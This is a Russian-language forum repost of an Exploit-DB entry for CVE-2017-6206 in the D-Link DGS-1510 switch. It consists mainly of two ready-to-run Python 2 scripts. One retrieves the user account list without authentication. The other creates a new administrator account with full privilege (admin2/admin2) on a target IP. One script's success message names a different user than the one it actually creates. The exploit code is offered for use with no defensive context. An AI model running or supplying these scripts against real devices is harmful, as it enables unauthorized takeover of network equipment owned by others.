Exploit D-Link DGS-1510 - Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
41662
Проверка EDB
  1. Пройдено
Автор
VARANG AMIN
Тип уязвимости
WEBAPPS
Платформа
HARDWARE
CVE
cve-2017-6206
Дата публикации
2017-03-20
D-Link DGS-1510 - Multiple Vulnerabilities
Код:
================
get-user-info.py
================

import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO

def make_requests():
	"""Calls request functions sequentially."""
	response = [None]
	responseText = None

	if(request_ip(response)):
		# Success, possibly use response.
		responseText = read_response(response[0])
                print responseText
		response[0].close()
	else:
		# Failure, cannot use response.
		pass


def read_response(response):
	""" Returns the text contained in the response.  For example, the page HTML.  Only handles the most common HTTP encodings."""
	if response.info().get('Content-Encoding') == 'gzip':
		buf = StringIO(response.read())
		return gzip.GzipFile(fileobj=buf).read()

	elif response.info().get('Content-Encoding') == 'deflate':
		decompress = zlib.decompressobj(-zlib.MAX_WBITS)
		inflated = decompress.decompress(response.read())
		inflated += decompress.flush()
		return inflated

	return response.read()


def request_ip(response):
	"""Tries to request the URL. Returns True if the request was successful; false otherwise.
	http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10
	
	response -- After the function has finished, will possibly contain the response to the request.
	
	"""
	response[0] = None

	try:
		# Create request to URL.
                import sys
                ip = sys.argv[1]
                print ip
		req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)

		# Set request headers.
		req.add_header("Connection", "keep-alive")
		req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
		req.add_header("X-Requested-With", "XMLHttpRequest")
		req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
		req.add_header("Referer", "http://%s/www/login.html"% ip)
		req.add_header("Accept-Encoding", "gzip, deflate, sdch")
		req.add_header("Accept-Language", "en-US,en;q=0.8")
		req.add_header("Cookie", "Language=en")

		# Get response to request.
		response[0] = urllib2.urlopen(req)

	except urllib2.URLError, e:
		# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
		if not hasattr(e, "code"):
			return False
		response[0] = e
	except:
		return False

	return True


make_requests()

===========
user_add.py
===========

import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO

def make_requests():
	"""Calls request functions sequentially."""
	response = [None]
	responseText = None

	if(request_ip(response)):
		# Success, possibly use response.
		responseText = read_response(response[0])
                print "Username dlinktest is successfully Added"
		response[0].close()
	else:
		# Failure, cannot use response.
                print "locha"
		pass


def read_response(response):
	""" Returns the text contained in the response.  For example, the page HTML.  Only handles the most common HTTP encodings."""
	if response.info().get('Content-Encoding') == 'gzip':
		buf = StringIO(response.read())
		return gzip.GzipFile(fileobj=buf).read()

	elif response.info().get('Content-Encoding') == 'deflate':
		decompress = zlib.decompressobj(-zlib.MAX_WBITS)
		inflated = decompress.decompress(response.read())
		inflated += decompress.flush()
		return inflated

	return response.read()


def request_ip(response):
	"""Tries to request the URL. Returns True if the request was successful; false otherwise.
	http://ip_address/form/User_Accounts_Apply
	
	response -- After the function has finished, will possibly contain the response to the request.
	
	"""
	response[0] = None

	try:
		# Create request to URL.
                import sys
                ip = sys.argv[1]
		req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)

		# Set request headers.
		req.add_header("Connection", "keep-alive")
		req.add_header("Cache-Control", "max-age=0")
		req.add_header("Origin", "http://%s/"% ip)
		req.add_header("Upgrade-Insecure-Requests", "1")
		req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
		req.add_header("Content-Type", "application/x-www-form-urlencoded")
		req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
		req.add_header("Referer", "http://%s/www/login.html"% ip)
		req.add_header("Accept-Encoding", "gzip, deflate")
		req.add_header("Accept-Language", "en-US,en;q=0.8")

		# Set request body.
		body = "action=0&username=admin2&privilege=15&type=0&password=admin2"

		# Get response to request.
		response[0] = urllib2.urlopen(req, body)

	except urllib2.URLError, e:
		# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
		if not hasattr(e, "code"):
			return False
		response[0] = e
	except:
		return False

	return True


make_requests()
 
Источник
www.exploit-db.com

Похожие темы